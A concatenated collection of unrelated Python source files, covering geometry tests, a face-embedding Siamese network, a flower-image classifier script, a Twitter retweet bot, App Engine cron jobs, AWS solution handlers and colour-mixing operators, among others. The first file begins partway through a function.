ur[0] = pt[0]
if pt[1] > ur[1]:
ur[1] = pt[1]
return tuple(ll), tuple(ur)
def _test_transform():
box = ((70000., 100000.), (75000., 125000.))
t = get_transform(box)
assert t.forward(box[0]) == (-0.2, -1)
assert t.forward((72500., 112500.)) == (0, 0)
assert t.forward(box[1]) == (0.2, 1)
assert t.backward((-0.2, -1)) == box[0]
assert t.backward((0.2, 1)) == box[1]
assert t.backward((0, 0)) == (72500, 112500)
def _test_box():
pts = [(78000., 100000.), (75000., 125000.)]
assert get_box(pts) == ((75000.0, 100000.0), (78000.0, 125000.0))
if __name__ == "__main__":
_test_transform()
_test_box()
|
python
|
from facenet_pytorch import InceptionResnetV1
class SiameseNet(nn.Module):
def __init__(self):
super().__init__()
self.encoder = InceptionResnetV1(pretrained='vggface2')
emb_len = 512
self.last = nn.Sequential(
nn.Linear(4*emb_len, 200, bias=False),
nn.BatchNorm1d(200, eps=0.001, momentum=0.1, affine=True),
nn.ReLU(),
nn.Linear(200, 1)
)
def forward(self, input1, input2):
emb1 = self.encoder(input1)
emb2 = self.encoder(input2)
x1 = torch.pow(emb1, 2) - torch.pow(emb2, 2)
x2 = torch.pow(emb1 - emb2, 2)
x3 = emb1 * emb2
x4 = emb1 + emb2
x = torch.cat((x1,x2,x3,x4), dim=1)
x = self.last(x)
return x
|
python
|
Import("env")
from SCons.Script import COMMAND_LINE_TARGETS
def buildWeb(source, target, env):
env.Execute("cd web; pnpm build")
print("Successfully built webui")
def convertImages(source, target, env):
env.Execute("cd converter; go run .")
print("Successfully converted images")
env.AddPreAction("buildprog", convertImages)
env.AddPreAction("uploadfs", buildWeb)
|
python
|
from . import tables
from . unquote import unquote as _unquote
__all__ = 'Quote', 'unquote'
SHORT_ASCII = '\\u{0:04x}'
LONG_ASCII = '\\u{0:04x}\\u{1:04x}'
def Quote(b):
return _QUOTES[bool(b)]
def unquote(s, strict=True):
return _QUOTES[s[0] == tables.SINGLE].remove(s, strict)
class _Quote:
def __init__(self, table):
for k, v in table.items():
setattr(self, k, v)
def add(self, s, ensure_ascii=False):
if ensure_ascii:
re, replace = self.escape_ascii_re, self._replace_ascii
else:
re, replace = self.escape_re, self._replace_unicode
return self.quote + re.sub(replace, s) + self.quote
def remove(self, s, strict=False):
return _unquote(self, s, strict)
def _replace_unicode(self, match):
return self.escape_dict[match.group(0)]
def _replace_ascii(self, match):
s = match.group(0)
try:
return self.escape_dict[s]
except KeyError:
pass
n = ord(s) if isinstance(s, str) else s
if n < 0x10000:
return SHORT_ASCII.format(n)
# surrogate pair
n -= 0x10000
s1 = 0xD800 | ((n >> 10) & 0x3FF)
s2 = 0xDC00 | (n & 0x3FF)
return LONG_ASCII.format(s1, s2)
_QUOTES = tuple(_Quote(t) for t in tables.QUOTES)
|
python
|
""" predict.py
Predict flower name from an image with predict.py along with the probability of
that name. That is, you'll pass in a single image /path/to/image and return the
flower name and class probability.
Basic usage:
python predict.py /path/to/image checkpoint
Args:
--img
--checkpoint
--top_k
--category_names
--gpu
Returns:
Most likely flower names and class probabilities
Examples:
Return top K most likely classes:
python predict.py input checkpoint --top_k 3
Use a mapping of categories to real names:
python predict.py input checkpoint --category_names cat_to_name.json
Use GPU for inference:
python predict.py input checkpoint --gpu
"""
__author__ = "Ken Norton <[email protected]>"
import json
import argparse
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image
from torchvision import transforms, models
def main():
parser = argparse.ArgumentParser(
description='Predict flower name from an image with along with the \
probability of that name. ')
parser.add_argument('--img',
type=str,
dest='image_path',
default='flowers/train/1/image_06770.jpg',
action='store',
help='File path to an image input')
parser.add_argument('--checkpoint',
default='model_checkpoint.pth',
type=str,
dest='checkpoint',
action='store',
help='Model checkpoint')
parser.add_argument('--top_k',
dest='top_k',
type=int,
default=5,
action='store',
help='Number of top classes to return')
parser.add_argument('--category_names',
type=str,
dest='category_names',
default='cat_to_name.json',
action='store',
help='JSON file containing category-name mapping')
parser.add_argument('--gpu',
type=bool,
dest='gpu',
default=True,
action='store',
help='Number of epochs')
pa = parser.parse_args()
path_to_img = pa.image_path
checkpoint = pa.checkpoint
top_k = pa.top_k
category_names = pa.category_names
gpu = pa.gpu
if (torch.cuda.is_available() and gpu):
gpu = True
device = torch.device('cuda:0')
else:
gpu = False
device = torch.device('cpu')
with open(category_names, 'r') as f:
cat_to_name = json.load(f)
def load_checkpoint(filepath):
cp = torch.load(filepath)
if cp['architecture'] == 'vgg16':
model = models.vgg16(pretrained=True)
model.name = 'vgg16'
elif cp['architecture'] == 'alexnet':
model = models.alexnet(pretrained=True)
model.name = 'alexnet'
# Freeze parameters so we don't backprop through them
for param in model.parameters():
param.requires_grad = False
model.class_to_idx = cp['class_to_idx']
model.classifier = cp['classifier']
model.load_state_dict(cp['state_dict'])
return model
def process_image(image):
''' Scales, crops, and normalizes a PIL image for a PyTorch model,
returns a NumPy array
'''
img_handler = Image.open(image)
process_img = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
])
return process_img(img_handler)
def predict(image_path, model):
model.to(device)
img_torch = process_image(image_path)
img_torch = img_torch.unsqueeze_(0)
img_torch = img_torch.float()
with torch.no_grad():
output = model.forward(img_torch.cuda())
probability = F.softmax(output.data, dim=1)
pb, cl = probability.topk(top_k)
if gpu:
return pb.cpu().numpy(), cl.cpu().numpy()
else:
return pb.numpy(), cl.numpy()
def print_predict(image_path, model):
probs, classes = predict(image_path, model)
probabilities = probs[0]
class_names = {val: key for key, val in model.class_to_idx.items()}
c_names = [cat_to_name[class_names[x]] for x in classes[0]]
index = np.arange(len(c_names))
print('Predictions for ', image_path, ':')
for i in index:
prob = "{0:.2f}".format(probabilities[i] * 100)
print(prob, '% -- ', c_names[i])
model = load_checkpoint(checkpoint)
print_predict(path_to_img, model)
if __name__ == "__main__":
main()
|
python
|
import accounting.config
import pytransact.testsupport
def pytest_configure(config):
global unconfigure
unconfigure = pytransact.testsupport.use_unique_database()
accounting.config.config.set('accounting', 'mongodb_dbname',
pytransact.testsupport.dbname)
def pytest_unconfigure(config):
unconfigure()
|
python
|
#!/usr/bin/python3
import math
#Generate the ovsf tree
def ovsfGenerator(numberOfMobile):
#calculate the depth of the OVSF code tree
numberOfColumn = math.ceil(math.log(numberOfMobile,2))
column = [1]
#Generation of the list of codes
for i in range (0,numberOfColumn):
newColumn=[]
xornumber=pow(2,pow(2,i))-1 #create a mask in order to do a bit inversion of the code
for j in column :
codesize = j.bit_length()
code=(j<<codesize) + j #generate the first code by duplicating the previous code
newColumn.append(code)
code=(j<<codesize) + (j^xornumber) #generate the second code by duplicating the previous code and inverting all bits of it
newColumn.append(code)
column=newColumn
return column
|
python
|
from pprint import pprint as pp
from funcs import *
import time
import random
import ConfigParser
config= ConfigParser.ConfigParser()
config.read('config.cfg')
PERIOD = int(config.get('Run','period'))
## currently set to make it so we don't hit window
## rate limits on friendship/show
## should be able to increase to 200 when using
## friendship/lookup
LIMIT = config.get('Run','limit')
def wait(period):
window_in_seconds = period * 60
seconds = random.randint(0,window_in_seconds)
pp("Waiting %d minutes" % (float(seconds) / 60) )
time.sleep(seconds)
def tweetserve():
# get the latest mentioners
mentioners = get_mentioners(LIMIT)
pp("# mentioners: %d" % len(mentioners))
# filter out those whose tweets are protected
mentioners = [m for m in mentioners if not m['protected']]
pp("# unprotected mentioners: %d" % len(mentioners))
ids = list(set([m['id'] for m in mentioners]))
pp("# unique ids: %d" % len(ids))
friendships = lookup_friendships(ids)
#filter out people that don't follow
friendships = [f for f
in friendships
if 'followed_by' in f['connections']]
pp("# following mentioners: %d" % len(friendships))
selected = random.sample(friendships,1)[0]
pp("Selected friend: %s / @%s" % (selected['name'],selected['screen_name']))
pp("Connections: %s" % (",".join(selected['connections'])))
sn = selected['screen_name']
#selects last 20 tweets by default but could have this be a setting
tweets = t.statuses.user_timeline(screen_name=sn)
if 'following' not in selected['connections']:
new_friend = t.friendships.create(screen_name=sn)
pp("Created new friendship")
rt = None
while rt is None and len(tweets) > 0:
lt = tweets.pop(0)
try:
rt = t.statuses.retweet(id=lt['id'])
pp("RT: @%s: %s" % (lt['user']['screen_name'],lt['text']))
except:
pp("Unable to RT tweet: @%s: %s" % (lt['user']['screen_name'],lt['text']))
pass
wait(PERIOD)
tweetserve()
|
python
|
#!/usr/bin/env python3.6
#
# uloop_check.py
#
# Gianna Paulin <[email protected]>
# Francesco Conti <[email protected]>
#
# Copyright (C) 2019-2021 ETH Zurich, University of Bologna
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# See LICENSE.sw.txt for details.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from uloop_common import *
import math
# high-level loop
def iterate_hl_loop(TP, oh, ow, nof, nif, fs, qa, qw):
ih = (oh - 1) + fs
iw = (ow - 1) + fs
FB = 5 # filter buffer size (FB*FB)
BS = 4 # block size
output_buffer_size = 3
n_tiles_K_in = int(math.ceil(nif/TP))
n_tiles_K_out = int(math.ceil(nof/TP))
n_tiles_Hout = int(math.ceil(ih/FB))
n_tiles_Wout = int(math.ceil(iw/FB))
n_tiles_qa = int(math.ceil(qa/BS))
n_xpatches = n_tiles_Hout * n_tiles_Wout #* n_tiles_qa
xpatch_size = FB*FB*BS*TP
ypatch_size = output_buffer_size*output_buffer_size*TP
# reset idices
y_idx = 0
W_idx = 0
NQ_idx = 0
x_idx = 0
curr_idx = (0, 0, 0, 0, 0)
if fs==3:
n_w_stream_per_x_patch = qw
w_stream_size = fs*fs*TP
total_w_stream = n_w_stream_per_x_patch*w_stream_size
else:
n_w_stream_per_x_patch = fs
w_stream_size = qw*TP
total_w_stream = n_w_stream_per_x_patch*w_stream_size
for i_major in range(n_tiles_Hout):
for j_major in range(n_tiles_Wout):
for k_out_major in range(n_tiles_K_out):
for k_in_major in range(n_tiles_K_in):
for qa_major in range(n_tiles_qa):
# print(i_major, j_major, k_out_major, k_in_major, qa_major)
# print(n_tiles_Hout, n_tiles_Wout, n_tiles_K_out, n_tiles_K_in, n_tiles_qa)
W_idx = k_out_major*(n_tiles_K_in*(2+total_w_stream))-k_out_major*2 + k_in_major*(total_w_stream+2)
y_idx = i_major*n_tiles_Wout*n_tiles_K_out*ypatch_size + j_major*n_tiles_K_out*ypatch_size + k_out_major*ypatch_size
x_idx = i_major*n_tiles_Wout*(n_tiles_K_in*n_tiles_qa*xpatch_size) + j_major*(n_tiles_K_in*n_tiles_qa*xpatch_size) + k_in_major*(n_tiles_qa*xpatch_size) + qa_major*xpatch_size
NQ_idx = k_out_major * 32 *(32+16)
curr_idx = i_major, j_major, k_out_major, k_in_major, qa_major
yield W_idx, x_idx, NQ_idx, y_idx, curr_idx
VERBOSE = True
def uloop_check(TP, oh, ow, nof, nif, fs, qa, qw, verbose=VERBOSE):
print("> Config TP=%d, oh=%d, ow=%d, nof=%d, nif=%d, fs=%d, qa=%d, qw=%d" % (TP, oh, ow, nof, nif, fs, qa, qw))
ih = (oh - 1) + fs
iw = (ow - 1) + fs
FB = 5 # filter buffer size (FB*FB)
BS = 4 # block size
n_tiles_K_in = int(math.ceil(nif/TP))
n_tiles_K_out = int(math.ceil(nof/TP))
n_tiles_Hout = int(math.ceil(ih/FB))
n_tiles_Wout = int(math.ceil(iw/FB))
n_tiles_qa = int(math.ceil(qa/BS))
n_xpatches = n_tiles_Hout * n_tiles_Wout
print("n_xpatches: ", n_xpatches)
loops_range = [
n_tiles_qa,
n_tiles_K_in,
n_tiles_K_out,
n_xpatches
]
if fs==3:
stream_size_fs = TP*fs*qw
else: # fs==1:
stream_size_fs = TP*fs*fs*qw
registers = [
0,
0,
0,
0,
0,
0,
nif,
nof,
TP*FB*FB*4,
TP*9,
stream_size_fs, #TP*fs*qw, # or TP*fs*fs*qw
TP*fs*fs*qw+2,
32*(32+16),
0
]
loops_ops,code,mnem = uloop_load("code.yml")
loops = uloop_get_loops(loops_ops, loops_range)
err = 0
idx = []
for j in range(NB_LOOPS):
idx.append(0)
state = (0,0,0,idx)
busy = False
execute = True
# uloop_print_idx(state, registers)
hidx = 0, 0, 0, 0, 0
hl_loop = iterate_hl_loop(TP, oh, ow, nof, nif, fs, qa, qw)
hW, hx, hNQ, hy, hidx = hl_loop.__next__()
for i in range(0,1000000):
new_registers = uloop_execute(state, code, registers)
execute,end,busy,state = uloop_state_machine(loops, state, verbose=verbose)
if execute:
registers = new_registers
if not busy:
try:
hW, hx, hNQ, hy, hidx = hW, hx, hNQ, hy, hidx = hl_loop.__next__()
except StopIteration:
pass
if verbose:
uloop_print_idx(state, registers)
uW, ux, uNQ, uy = registers[0:4]
if (hW != uW or hx != ux or hNQ != uNQ or hy != uy):
if verbose:
print(" ERROR!!!")
print(" High-level: W=%d x=%d NQ=%d y=%d" % (hW, hx, hNQ, hy))
print(" uLoop: W=%d x=%d NQ=%d y=%d" % (uW, ux, uNQ, uy))
err += 1
if end:
break
print(err, " errors", "!!!" if err > 0 else "")
return err
for oh in range(3,12,3):
for ow in range(3,12,3):
for fs in (1,0):
for nif in range(32, 64+32, 32):
for qa in range(1,9):
for qw in range(1,9):
for nof in range(32, 64+32, 32):
err = uloop_check(
TP = 32,
fs = fs,
nof = nof,
nif = nif,
oh = oh,
ow = ow,
qa = qa,
qw = qw,
verbose = False
)
if err>0:
break
if err>0:
break
if err>0:
break
if err>0:
break
if err>0:
break
if err>0:
break
if err>0:
break
if err>0:
uloop_check(
TP = 32,
fs = fs,
nof = nof,
nif = nif,
oh = oh,
ow = ow,
qa = qa,
qw = qw,
verbose = True
)
|
python
|
"""Cron job code."""
from google.appengine.ext import ndb
import cloudstorage
import datetime
import logging
from api import PermissionDenied
from model import (Email, ErrorChecker, Indexer, User)
import config
import util
class Cron:
"""A collection of functions and a permission scheme for running cron jobs.
Very similar to api.Api."""
def __init__(self, api):
"""Requires an admin api object."""
if not api.user.is_admin:
raise PermissionDenied("Crons must be run as admin.")
self.api = api
def check_for_errors(self):
"""Check for new errors - email on error.
Must be called with internal_api for full permissions.
See named_model@Index for full description.
"""
checker = ErrorChecker.get_or_insert('the error checker')
result = checker.check()
checker.put()
return result
def send_pending_email(self):
"""Send any email in the queue.
Must be called with internal_api for full permissions.
See id_model@Email for full description.
"""
return Email.send_pending_email()
def assign_usernames(self):
"""Assigns usernames to all existing users without a
current username
"""
query = User.query()
changed_users = []
for user in query:
user_dict = user.to_dict()
if user_dict.get('username') is None:
user.username = User.create_username(**user_dict)
changed_users.append(user)
# Removes bad first_names
elif 'first_name' in user_dict:
if '@' in user_dict['first_name']:
user.first_name = user_dict['first_name'].split('@')[0]
user.username = None
changed_users.append(user)
# Temporary limiting for acceptance
if len(changed_users) > 40:
break
ndb.put_multi(changed_users)
return changed_users
def index_all(self):
"""Cron job to index all content. Should only be run as
a job because it will likely timeout otherwise. Comes in handy
for production where updates are constantly being made.
"""
indexer = Indexer.get_or_insert('the-indexer')
index = indexer.get_index()
entities = indexer.get_all_content_entities()
indexed_count = 0
for entity in entities:
# Added redundancy (we really don't want these!!)
if getattr(entity, 'listed') is True:
index.put(entity.to_search_document())
indexed_count += 1
# Update last_check on indexer to now
now = datetime.datetime.now()
indexer.last_check = (
now
)
indexer.put()
return indexed_count
def index(self):
"""Index content entities for text search.
Must be called with internal_api for full permissions.
See named_model@Index for full description.
"""
indexer = Indexer.get_or_insert('the-indexer')
index = indexer.get_index()
# Now and the max modified time of indexed entites
# will be used to update last_check. Basically the
# last check should either be now time if no items
# were found to update or the age of the last item
# that was updated.
#
# The reason that we cannot always use now time is
# because we may not index all of the enties between
# the last check and now if there are many of them.
now = datetime.datetime.now()
max_modified_time_of_indexed_entity = None
# get changes
changed_entities = indexer.get_changed_content_entities()
# post changes
for entity in changed_entities:
# Added redundancy (we really don't want these!!)
if getattr(entity, 'listed') is True:
index.put(entity.to_search_document())
# Update the most recent modification time for an
# indexed entity
if max_modified_time_of_indexed_entity is None:
max_modified_time_of_indexed_entity = entity.modified
else:
max_modified_time_of_indexed_entity = max(
max_modified_time_of_indexed_entity,
entity.modified
)
# Update last_check so that future calls to index no longer
# try to index these same items. The logic of what to set
# last_check to is articulated above.
any_updates = max_modified_time_of_indexed_entity is not None
indexer.last_check = (
now if not
any_updates
else max_modified_time_of_indexed_entity
)
indexer.put()
return changed_entities
def clean_gcs_bucket(self, bucket):
"""Deletes all files in a given GCS bucket.
Used for emptying out cluttered buckets, like our backup buckets."""
filenames = [f.filename for f in cloudstorage.listbucket('/' + bucket)]
files_deleted = []
for filename in filenames:
try:
cloudstorage.delete(filename)
files_deleted.append(filename)
except cloudstorage.NotFoundError:
# We don't care, as long as the bucket winds up empty.
logging.warning("NotFoundError on file {}".format(filename))
logging.info("Files deleted: {}".format(files_deleted))
return files_deleted
|
python
|
######################################################################################################################
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
######################################################################################################################
# !/bin/python
from lib.state_machine import StateMachine
from lib.ssm import SSM
from lib.cloud_watch_events import CloudWatchEvents
from lib.metrics import Metrics
from lib.string_manipulation import convert_string_to_list
from os import environ
import time
import inspect
from lib.helper import sanitize, get_region
from lib.s3 import S3
import os
import json
from uuid import uuid4
class StepFunctions(object):
# Execute State Machines
def __init__(self, event, logger):
self.logger = logger
self.event = event
self.logger.info("State Machine Event")
self.logger.info(event)
def trigger_state_machine(self):
try:
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
sm = StateMachine(self.logger)
account_id = self.event.get('account')
resource_type = 'stno-console' if self.event.get('detail', {}).get('resource-type') is None \
else account_id + '-' + self.event.get('detail', {}).get('resource-type') + '-tagged'
state_machine_arn = environ.get('STATE_MACHINE_ARN')
# Execute State Machine
exec_name = "%s-%s-%s" % ('event-from', resource_type, time.strftime("%Y-%m-%dT%H-%M-%S-%s"))
self.event.update({'StateMachineArn': state_machine_arn})
self.logger.info("Triggering {} State Machine".format(state_machine_arn.split(":", 6)[6]))
response = sm.trigger_state_machine(state_machine_arn, self.event, sanitize(exec_name))
self.logger.info("State machine triggered successfully, Execution Arn: {}".format(response))
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
class CWEventPermissions(object):
def __init__(self, event, logger):
self.event = event
self.params = event.get('ResourceProperties')
self.event_bus_name = self.params.get('EventBusName')
self.logger = logger
self.logger.info("CloudWatch Event Permissions Handler Event")
self.logger.info(event)
def _print_policy(self, cwe):
self.logger.info("Describe Event Bus")
response = cwe.describe_event_bus(self.event_bus_name)
policy = 'Policy Not Found' if response.get('Policy') is None else json.loads(response.get('Policy'))
self.logger.info("Printing Policy")
self.logger.info(policy)
def _is_valid_account_length(self, principal):
account_id_length = 12
if len(principal) == account_id_length:
self.logger.info('The AWS Account ID is 12-digit number. Continuing... ')
else:
raise Exception('The AWS Account ID should be 12-digit number.')
def _create(self, principal_list):
cwe = CloudWatchEvents(self.logger)
# identify if principal is list of account IDs or organization arn
response = None
self.logger.info("Adding following principals to the policy: {}".format(principal_list))
for principal in principal_list:
if 'arn:aws:organizations' in principal:
self.logger.info('Adding Organization ID to the policy: {}'.format(principal))
split_value = principal.split('/')[-1]
condition = {
'Type': 'StringEquals',
'Key': 'aws:PrincipalOrgID',
'Value': split_value
}
# Once we specify a condition with an AWS organization ID, the recommendation is we use "*" as the value
# for Principal to grant permission to all the accounts in the named organization.
response = cwe.put_permission('*', split_value, self.event_bus_name, condition)
else:
self._is_valid_account_length(principal)
self.logger.info('Adding spoke account ID to the policy: {}'.format(principal))
response = cwe.put_permission(principal, principal, self.event_bus_name)
self._print_policy(cwe)
return response
def create_permissions(self):
try:
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
# put permissions
# analyze if the principals is a list of accounts or Org Arn
self._create(self.params.get('Principals'))
return None
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
def update_permissions(self):
try:
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
# update permissions
response = None
principal_list = self.params.get('Principals')
old_params = self.event.get('OldResourceProperties')
old_principal_list = old_params.get('Principals')
# Generate add and remove lists for update process
delete_list = list(set(old_principal_list) - set(principal_list))
self.logger.info('Remove permission for following principal(s): {}'.format(delete_list))
# if list is not empty
if delete_list:
response = self._delete(delete_list)
add_list = list(set(principal_list) - set(old_principal_list))
self.logger.info('Put permission for following principal(s): {}'.format(add_list))
# if list is not empty
if add_list:
response = self._create(add_list)
return response
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
def _delete(self, principal_list):
cwe = CloudWatchEvents(self.logger)
self.logger.info("Removing following principals from the policy: {}".format(principal_list))
# identify if principal is list of account IDs or organization arn
response = None
for principal in principal_list:
if 'arn:aws:organizations' in principal:
self.logger.info('Deleting Organization ID from the policy: {}'.format(principal))
split_value = principal.split('/')[-1]
response = cwe.remove_permission(split_value, self.event_bus_name)
else:
self.logger.info('Deleting spoke account ID from the policy: {}'.format(principal))
response = cwe.remove_permission(principal, self.event_bus_name)
self._print_policy(cwe)
return response
def delete_permissions(self):
try:
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
# delete permissions
# analyze if the principals is a list of accounts or Org Arn
response = self._delete(self.params.get('Principals'))
return response
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
# Deploy all the files needed for console to customer's S3 bucket and
# update the configuration file with customer configurations
class S3ConsoleDeploy(object):
def __init__(self, event, logger):
self.event = event
self.params = event.get('ResourceProperties')
self.logger = logger
self.logger.info("Upload console content to s3")
self.logger.info(event)
# Upload console content listed in the manifest file to customer's s3 bucket
def upload_console_files(self):
try:
s3 = S3(self.logger)
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
file_path = os.path.join(os.path.dirname(__file__), "console-manifest.json")
if os.path.exists(file_path):
with open(file_path, 'r') as json_data:
data = json.load(json_data)
destination_bucket = self.params.get('ConsoleBucket')
source_bucket = self.params.get('SrcBucket')
key_prefix = self.params.get('SrcPath') + '/'
for file in data["files"]:
key = 'console/' + file
s3.copy_object(source_bucket, key_prefix, key, destination_bucket)
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
# Upload the configuration file having customer configurations to customer's s3 bucket
def upload_config_file(self):
try:
s3 = S3(self.logger)
self.logger.info("Executing: " + self.__class__.__name__ + "/" + inspect.stack()[0][3])
stno_config = {
"aws_project_region": self.params.get("AwsProjectRegion"),
"aws_cognito_region": self.params.get("AwsCognitoRegion"),
"aws_user_pools_id": self.params.get("AwsUserPoolsId"),
"aws_user_pools_web_client_id": self.params.get("AwsUserPoolsWebClientId"),
"aws_cognito_identity_pool_id": self.params.get("AwsCognitoIdentityPoolId"),
"oauth": {},
"aws_appsync_graphqlEndpoint": self.params.get("AwsAppsyncGraphqlEndpoint"),
"aws_appsync_region": self.params.get("AwsAppsyncRegion"),
"aws_appsync_authenticationType": "AMAZON_COGNITO_USER_POOLS",
"aws_content_delivery_bucket": self.params.get("AwsContentDeliveryBucket"),
"aws_content_delivery_bucket_region": self.params.get("AwsContentDeliveryBucketRegion"),
"aws_content_delivery_url": self.params.get("AwsContentDeliveryUrl")
}
configurations = 'const stno_config = ' + json.dumps(stno_config) + ';'
console_bucket = self.params.get('ConsoleBucket')
key = 'console/assets/stno_config.js'
s3.put_object(console_bucket, key, configurations)
except Exception as e:
message = {'FILE': __file__.split('/')[-1], 'CLASS': self.__class__.__name__,
'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}
self.logger.exception(message)
raise
class PrefixListIdToArnConverter(object):
def __init__(self, event, logger):
self.event = event
self.params = event.get('ResourceProperties')
self.logger = logger
self.logger.info(event)
def get_prefix_list_arns(self) -> dict:
"""
Converts the list of prefix list ids to list of prefix list ARNs
:return: list of arns for the customer provided prefix lists
"""
prefix_list = self.params.get('PrefixListIds')
account_id = self.params.get('AccountId')
list_of_prefix_list_ids = convert_string_to_list(prefix_list)
self.logger.info(f"Processing prefix list ids:"
f" {list_of_prefix_list_ids}")
list_of_prefix_list_arns = []
if len(list_of_prefix_list_ids) == 0:
raise ValueError("STNO CFN Parameter Missing: You must "
"provide at least one valid prefix list id.")
else:
for prefix_list_id in list_of_prefix_list_ids:
arn = "%s%s:%s%s%s" % ("arn:aws:ec2:",
environ.get('AWS_REGION'),
account_id,
":prefix-list/",
prefix_list_id)
list_of_prefix_list_arns.append(arn)
response = {"PrefixListArns": list_of_prefix_list_arns}
return response
# Send anonymous metrics
class CFNMetrics(object):
def __init__(self, event, logger):
self.event = event
self.params = event.get('ResourceProperties')
self.logger = logger
self.logger.info(event)
def put_ssm_parameter(self, key, value):
try:
ssm = SSM(self.logger)
response = ssm.describe_parameters(key)
self.logger.info(response)
# put parameter if key does not exist
if not response:
ssm.put_parameter(key, value)
except Exception as e:
self.logger.info(e)
pass
# put metrics_flag and uuid in the parameter store
def put_ssm(self):
try:
# create SSM parameters to send anonymous data if opted in
flag_value = self.params.get('MetricsFlag')
self.put_ssm_parameter('/solutions/stno/metrics_flag', flag_value)
self.put_ssm_parameter('/solutions/stno/customer_uuid', str(uuid4()))
except Exception as e:
self.logger.info(e)
pass
# Upload the configuration file having customer configurations to customer's s3 bucket
def send_metrics(self):
try:
self.put_ssm()
self.logger.info(self.params)
data = {
"PrincipalType": self.params.get('PrincipalType'),
"ApprovalNotificationFlag": self.params.get('ApprovalNotification'),
"AuditTrailRetentionPeriod": self.params.get('AuditTrailRetentionPeriod'),
"DefaultRoute": self.params.get('DefaultRoute'),
"Region": get_region(),
"SolutionVersion": self.params.get('SolutionVersion'),
"CreatedNewTransitGateway": self.params.get(
'CreatedNewTransitGateway')
}
send = Metrics(self.logger)
send.metrics(data)
except Exception as e:
self.logger.info(e)
pass
|
python
|
"""
Operators with arity 2.
Take 2 colors and mix them in some way. Owns two 0/1 arity operators,
which calculate the initial colors.
Adds a shift by colors, that is, for two colors [rgb] + [RGB] can mix as
([rR gG bB], [rG gB bR], [rB gR bG]).
"""
from abc import ABC, abstractmethod
from .base import Operator, operator_subclass_names, COLOR_TYPE
from .arity_1_operators import ZERO_ONE_OPERATOR
class TwoArityOperator(Operator, ABC):
"""
This is a two-level operator.
Modifies and mix the original values using the formula from the
`formula` method.
Has two colors that were originally generated.
"""
arity = 2
suboperators: tuple[ZERO_ONE_OPERATOR]
def __self_init__(self):
self.shift = self.random.randint(0, 2)
def __str_extra_args__(self) -> list[str]:
return [f"shift={self.shift}"]
@abstractmethod
def formula(self, col_1: float, col_2: float) -> float:
"""
The formula by which the two channels of colors are mixed.
"""
pass
def func(self, first_col: COLOR_TYPE, second_col: COLOR_TYPE) -> COLOR_TYPE:
"""
Color generation function. Accepts data for generation and
outputs the first color step according to the described formula.
"""
return (
self.formula(first_col[0], second_col[(0 + self.shift) % 3]),
self.formula(first_col[1], second_col[(1 + self.shift) % 3]),
self.formula(first_col[2], second_col[(2 + self.shift) % 3]),
)
# ======================================================================
class Sum(TwoArityOperator):
"""
Calculates the average between the two colors.
Slightly decreases the brightness of the color because it mixed
values.
"""
def formula(self, col_1, col_2):
return (col_1 + col_2) / 2
class Product(TwoArityOperator):
"""
Multiplies one color by another.
"""
def formula(self, col_1, col_2):
return col_1 * col_2
class Mod(TwoArityOperator):
"""
Calculates the mod of one color relative to another.
It decreases the brightness of the color, making it more like gray
color (0.0), as it multiplies the fractional values by each other.
"""
def formula(self, col_1, col_2):
if col_2 == 0:
return 0
return col_1 % col_2
class Exponentiation(TwoArityOperator):
"""
It changes the color by multiplying one color by a degree of
another. The color sign is taken from the second color sign.
It increases the brightness of the color, almost always giving
brightness (< -0.5) | (> 0.5).
"""
def formula(self, col_1, col_2):
col_1 = abs(col_1)
if col_2 < 0:
return - col_1 ** abs(col_2)
else:
return col_1 ** col_2
ZERO_ONE_TWO_OPERATOR = ZERO_ONE_OPERATOR | TwoArityOperator
__all__ = operator_subclass_names(locals())
|
python
|
from urllib.parse import urlparse
def parse_link(link):
href = link.attrs.get("href")
return href and urlparse(href)
|
python
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.7
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/python-logo-notext.svg"
# style="display:block;margin:auto;width:10%"/>
# <h1 style="text-align:center;">Convolutional Neural Nets</h1>
